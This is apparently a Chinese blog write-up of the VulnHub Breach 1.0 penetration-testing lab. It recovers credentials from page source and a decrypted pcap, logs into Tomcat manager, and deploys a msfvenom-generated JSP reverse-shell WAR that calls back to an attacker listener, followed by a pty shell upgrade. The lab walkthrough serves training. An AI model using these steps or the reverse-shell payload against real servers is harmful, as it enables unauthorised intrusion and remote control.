VulnHub渗透测试靶场Breach 1.0

  • 时间:
  • 来源:互联网

一、浏览器访问192.168.110.140在这里插入图片描述

二、点击图片,进入后台
在这里插入图片描述
三、点击Employee portal进入登录后台
在这里插入图片描述

四、发现需要登录密码,接下来就是获得密码
在这里插入图片描述
按F12打开开发者模式,发现旁注里有解密后的用户和密码,用base64解码,得到用户和密码
在这里插入图片描述
五、登录进去之后,我们开始进行信息收集,我们发现了两条有用的信息

在这里插入图片描述

在这里插入图片描述

通过这个网址,我们下载下来了一个证书,生成的密钥文件 因为他是一个浏览器的认证所以解不开
在这里插入图片描述

在这里插入图片描述

通过这个网址我们得到了一个pcap流量包,截取攻击的流量包 我是在百度开始搜索nginx生成ssl证书 下面会介绍

六、我们来分析该流量,我们将流量包放在wireshark上,发现因为是https协议,所以都是密文的,我们无法得到什么信息

在这里插入图片描述

在这里插入图片描述

七、所以我们得想办法将其变成明文的,方便我们收集信息,这就是我们接下来的任务,我们首先知道刚才下载了一个keystore的证书,我们试着将这个证书导到wireshark中,看看可不可以,尝试过后发现不可以,流量还是密文的,后来我们知道应该讲证书转化成p12格式才可以被解析,那接下来我们来操作这步

首先我们把keystore传到moba上,然后在kali上敲

keytool -importkeystore  -srckeystore /root/keystore -destkeystore /root/nima.p12 -deststoretype PKCS12  -srcalias tomcat

在这里插入图片描述

得到了一个nima.p12的证书,接下来我们将这个证书导到wireshark上

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

8443可能是https协议所以设值为他

(这一步得打个注释:我这里选的是TLS,因为是老版,新版的话直接选SSL就可以了) 解完包会变成http格式

在这里插入图片描述

在这里插入图片描述

(这里也得强调一下,这里这个IP地址写的不是目的地址,而是自己的主机IP,协议要写http,而不是https)

八、最后点击ok就导入完成了,这时我们发现流量多了http的流量,我们去追它http流,发现是明文的了,401代表登陆失败 可以判断出穿的木马

在这里插入图片描述

九、那我们现在可以开始收集信息了,我们在上面看到401,需要登录,往下翻发现有200状态码,说明登录成功了,那我们往上看,肯定有账号密码,然后我们发现了被加密过了的账号和密码,我们将其复制去解码器中解码,得到了账号和密码 tomcat:Tt\5D8F(#!*u=G)4m7zB

在这里插入图片描述

十、接下来我们去找这个需要登录的tomcat的页面,我们去分析它的流量找到了这个网址

在这里插入图片描述
发现从192.168.110.129到192.168.110.140的攻击流量包,其中有cmd命令马执行了id命令,攻击者上传了两张图片,疑似图片马,但是命令马无法直接访问,需要登录tomcat后台:
在这里插入图片描述

十一、接下来我们去浏览器访问该网址,发现无法访问,因为我们没有相应的证书,它有限制,我们新版的浏览器都不允许访问
在这里插入图片描述

但我们知道burp上也有各种证书,所以我们挂上代理,用burp代理放包,达到访问的目的
在这里插入图片描述

放包之后发现出现了登录框,我们输入上面得到的账号和密码

在这里插入图片描述

放包,发现了tomcat的页面

在这里插入图片描述

我们向上面传木马,用msf生成木马

msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.110.189 lport=8989 -f war -o shandian.war

在这里插入图片描述

为了不用一次次的放包,我们现在直接设置成不拦截

在这里插入图片描述

然后访问木马,这边kali上监听
在这里插入图片描述

在这里插入图片描述

最后得到权限

我们可以使用 python -c ‘import pty;pty.spawn("/bin/bash")’ 使其有bash模式
还可以使用 id 看我们当前的权限 为tomcat6(普通用户权限)

在这里插入图片描述

你今天真好看.
发布了3 篇原创文章 · 获赞 0 · 访问量 19
私信 关注

本文链接http://element-ui.cn/news/show-1021.aspx